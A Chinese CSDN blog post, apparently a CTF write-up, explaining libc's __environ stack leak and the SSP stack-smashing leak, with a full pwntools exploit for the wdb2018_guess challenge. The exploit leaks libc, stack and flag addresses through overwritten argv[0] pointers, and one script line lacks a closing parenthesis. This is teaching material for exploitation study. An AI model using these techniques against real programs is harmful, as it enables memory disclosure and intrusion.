_environ与ssp攻击

已于 2022-03-09 21:29:33 修改
阅读量1.4k 收藏 6
点赞数 5
文章标签: pwn
于 2022-02-21 15:12:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Invin_cible/article/details/123042863
版权

_environ

在Linux C中,environ是一个全局变量,它储存着系统的环境变量。

它储存在libc中

因此environ是沟通libc地址与栈地址的桥梁。

如图:即为一个程序中environ的具体信息:

1

environ利用

通过libc找到environ地址后,泄露environ地址处的值,可以得到环境变量地址,环境变量保存在栈中,通过偏移可以得到栈上任意变量的地址。

ssp攻击

canary的各种利用方式中,有一种是通过 __stack_chk_fail函数打印报错信息来实现。

__stack_chk_fail源码:

void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
  __fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
  /* The loop is added only to keep gcc happy.  */
  while (1)
    __libc_message (2, "*** %s ***: %s terminatedn",
                    msg, __libc_argv[0] ?: "<unknown>");
}

据源码可见,报错信息中会打印出libc_argv[0]的值,而libc_argv[0]指向的则是程序名。

若我们能够栈溢出足够的长度,覆盖到__libc_argv[0]的位置,那我们就能让程序打印出任意地址的数据,造成任意地址数据泄露。这就是ssp攻击。

实例分析

wdb2018_guess

程序流程

  • 程序将flag读到栈上,并且执行了三次fork函数。

  • 同时有一个任意长度的栈溢出。

关于fork函数:

fork函数用于创建一个与当前进程映像一样的子进程,所创建的子进程将复制父进程的代码段、数据段、BSS段、堆、栈等所有用户空间信息,在内核中操作系统会重新为其申请一个子进程执行的位置。

调试偏移

找到__libc_argv[0]与输入点之间的偏移:

在gets函数处下断点:

2

rdi即为输入点,而程序名即为__libc_argv[0]所处的位置,两者的偏移为:

0x7ffe86c47748-0x7ffe86c47620 = 0x128

第一次fork:泄露libc基址

利用ssp攻击打印出puts函数真实地址:

def fork(content):
    r.recvuntil(b"Please type your guessing flag")
    r.sendline(content)
    
puts_got = elf.got["puts"]

fork(b'a'*0x128+p64(puts_got))
puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")

第二次fork:泄露environ所指的栈地址

通过libc与其偏移找到environ地址:

environ_addr = libc_base + libc.dump("__environ")

泄露环境变量地址:

fork(b'a'*0x128+p64(environ_addr))
stack_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))
log.success("libc_base:"+hex(libc_base))
log.success("stack_addr:"+hex(stack_addr))

第三次fork:泄露flag

断点依旧下载gets函数处:

3

其中 flag{you_are_a_pig}是我本地flag文件的内容

泄露出来的环境变量的地址是0x7ffc1e329638

所以flag地址与__libc_argv[0]偏移为:

0x7ffc1e329638-0x7ffc1e3294d0 = 0x168

直接用ssp攻击泄露flag:

flag_addr = stack_addr-0x168
fork(b'a'*0x128+p64(flag_addr))

exp

from pwn import *
from LibcSearcher import*
context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/BUUCTF/GUESS'
elf = ELF('/mnt/hgfs/ubuntu/BUUCTF/GUESS')

def fork(content):
    r.recvuntil(b"Please type your guessing flag")
    r.sendline(content)

puts_got = elf.got["puts"]
fork(b'a'*0x128+p64(puts_got))
puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
environ_addr = libc_base + libc.dump("__environ")
fork(b'a'*0x128+p64(environ_addr))
stack_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))
log.success("libc_base:"+hex(libc_base))
log.success("stack_addr:"+hex(stack_addr))
flag_addr = stack_addr-0x168
fork(b'a'*0x128+p64(flag_addr))
r.interactive()
Loτυs
关注
Jarvis OJ --Smashes (SSP leak攻击
Kni9hT's Blog
11-03 821
1
线程池(VC_Win32)
NickWei的博客
07-12 2466
线程池 (本章节中例子都是用 VS2010 编译调试的) 线程池编写必须在 Windows Vista 操作系统(以及以上版本的操作系统)下,且 C++ 编译器版本至少是 VS2008  线程池的功能 以异步的方式来调用一个函数每隔一段时间调用一个函数当内核对象触发的时候调用一个函数当异步 I/O 请求完成的时候调用一个函数 注意 当一个进程初始化的时候,它并没有任何
BUUCTF【GUSESS】(利用canary报错信息ssp攻击)
weixin_51055545的博客
04-29 403
文章目录通过canary报错信息来解题(ssp攻击)前言:背景知识:检查保护:IDA分析:exp分析: 通过canary报错信息来解题(ssp攻击) 前言: ​ 我们知道栈溢出的基本原理是通过发送大量数据,溢出导致覆盖返回地址,劫持程序执行流,针对开启canary保护的题目,程序中存在gets()或类似这样的危险溢出函数,却又没其他洞的情况下,我们可以利用ssp攻击达到get flag,或get shell的目的. 背景知识: ​ 我们输入过多数据,导致栈溢出时,程序puts出来的报错信息同样是调用了__
Linux environ 环境变量指针
Andes Home 千年的塔 -十年技术,风雨兼程
03-04 5402
POSIX.1也规定应使用environ而不使用第三个参数。通常用getenv和putenv函数(7.9节将说明)来存取特定的环境变量,而不是用environ变量。但是,如果要查看整个环境, 则必须使用environ指针。 unistd.h:extern char **__environ; unistd.h:extern char **environ; #include ex
[BUUCTF-pwn]——wdb2018_guess (environ环境变量)
Y_peak的博客
04-06 1473
[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA中看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路 思路来了 利用主动触发canary保护, 调用**
Linux中environ变量的使用
妙木山
11-21 1795
environ变量时一个char**类型的变量,其中存放着系统的全局变量,可以通过对environ输出来输出系统的全局变量。 因为environ是一个外部的全局变量,所以在使用时需要用extern声明一下。另一种使用方法是使用unistd.h头文件,但是在unistd.h头文件中定义environ的地方使用了条件编译#ifdef __USE_GUN,在Linux C中默认没有定义这个宏,所以需要...
PyPI 官网下载 | django_environ-0.3.1-py2-none-any.whl
02-14
"django_environ-0.3.1-py2-none-any.whl"是这个资源的完整名称,它进一步确认了这是一个Django框架相关的Python库,且兼容Python 2版本。 **标签解析:** "django" - Django是一个广泛使用的开源Web应用框架,用...
VB_Environ系统环境变量函数大全
07-10
- **`Environ("HOMEPATH")`**: 返回用户的主目录路径,`HOMEDRIVE`组合可以得到完整的用户主目录路径。 - **`Environ("NUMBER_OF_PROCESSORS")`**: 返回计算机中处理器的数量。 - **`Environ("OS")`**: 返回操作...
Ubuntu20_Auto_ML_DL_Environ:自动安装了ML和DL(pytorch tensorflow keras)环境,并提供了许多有用的工具,Ubuntu 20.04
05-23
Ubuntu-20.04自动ML&DL服务器 :flexed_biceps: 标签: lab z-tech 介绍 该仓库用于为Ubuntu-20.04安装ML&DL环境,并带有pytorch1.4.0 tensorflow2.2.0 keras,此外还安装了vim zshell有用的插件。...
CTF-PWN: 通过libc _environ 泄露栈地址的原理
weixin_59166557的博客
01-21 208
注意: 本文是基于的,我不能确保文章完全准确在libc中,_environ符号指向的是一个全局变量,通常用于存储程序的环境变量数组。具体来说,_environ是一个指向字符串数组的指针,每个字符串表示一个环境变量(如HOMEPATH等)。这个数组的结尾是一个NULL指针,表示环境变量的结束。
进程的环境变量environ
weixin_30835923的博客
03-27 237
编程之路刚刚开始,错误难免,希望大家能够指出。 每个进程都有自己的环境变量,在C语言程序中可使用外部变量(char **environ)来访问环境,而库函数可允许进程去获取或修改自己环境的值。   两种方法使用该变量。   第一种是将其直接声明为外部变量,就可以直接调用了:         第二种,该变量在unistd.h头文件里已有声明,打开头文件如下:      可以看到...
environ泄露栈地址+orw+uaf
FUCKING12的博客
10-08 767
这个题开了沙箱,有uaf。利用思路:借助environ泄露栈地址,利用uaf将orw写到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
CTF权威指南 笔记 -第四章Linux安全机制-4.1-Linux基础
m0_64180167的博客
05-08 728
这里给出linux常用命令。
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 513
stack smash
wdb2018_guess
z1r0的博客
01-19 1060
wdb2018_guess 查看保护 这里开了canary,溢出时会报错 可以看到报错后面会输出程序名字,既然flag被放到了栈上是不是也可以被输出。 environ是libc中存储栈地址的一个变量,可以通过environ算出flag的偏移,再将flag通过canary来输出。 想要知道environ的地址还需要知道libc的地址,libc的地址可以通过got来算。 那么第一步就是需要算出argv[0]gets这个地方ebp-0x40的偏移。 argv[0]的地址为0x7fffffffdeb8,
【Linux系统编程】环境变量的组织方式
m0_74246469的博客
01-18 1016
在环境变量的基础认识下进一步认识环境变量的组织方式
[BUUCTF]PWN——wdb2018_guess(stack smashing--canary报错利用)
mcmuyanga的博客
03-14 1475
wdb2018_guess 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况 64位ida载入 存在溢出利用点,但是有canary保护,这边39行和41行的puts函数是写死的,没法用来接收泄露的信息,想到了利用canary的报错输出 在程序加了 carry 保护后,如果我们的输入覆盖了 carry ,程序就会报错,报错代码如下,可以看到,程序会执行 __stack_chk_fail 函数来打印 __libc_argv[0] 指针所指向的字符串(默认存储的是程序的名称)
usethis::edit_r_environ()
最新发布
03-14
### 如何使用 `usethis::edit_r_environ()` 编辑 R 的环境变量配置文件 `usethis::edit_r_environ()` 是一个用于编辑 R 环境变量配置文件的函数。通过该函数可以轻松打开 `.Renviron` 文件并修改其中的内容,从而定义或更新环境变量。 #### 打开和编辑 `.Renviron` 文件 执行以下命令可以在默认文本编辑器中打开 `.Renviron` 文件: ```r usethis::edit_r_environ() ``` 这会启动系统的默认文本编辑器,并加载当前用户的 `.Renviron` 文件[^2]。 #### 添加新的环境变量 在打开的 `.Renviron` 文件中,可以直接添加键值对来定义环境变量。例如,如果需要设置 GitHub 个人访问令牌 (PAT),可以按照如下格式书写: ``` GITHUB_PAT="你的GitHub PAT" ``` 同样地,对于其他类型的密钥(如高德地图 API 密钥),也可以采用类似的格式进行定义: ``` amap.key="你自己申请的高德地图密钥" ``` 上述操作完成后保存文件即可完成环境变量的设定[^3]。 #### 验证环境变量是否生效 为了验证新添加的环境变量是否成功加载,可以通过以下方法测试其值是否存在: ```r Sys.getenv("GITHUB_PAT") # 测试 GitHub PAT 是否存在 Sys.getenv("amap.key") # 测试高德地图密钥是否已加载 ``` 如果返回对应的值,则说明环境变量已经正确设置。 #### 注意事项 - 如果未找到现有的 `.Renviron` 文件,`usethis::edit_r_environ()` 将自动创建一个新的文件。 - 修改后的 `.Renviron` 文件仅会在重新启动 R 或者手动调用 `readRenviron("~/.Renviron")` 后才生效[^1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值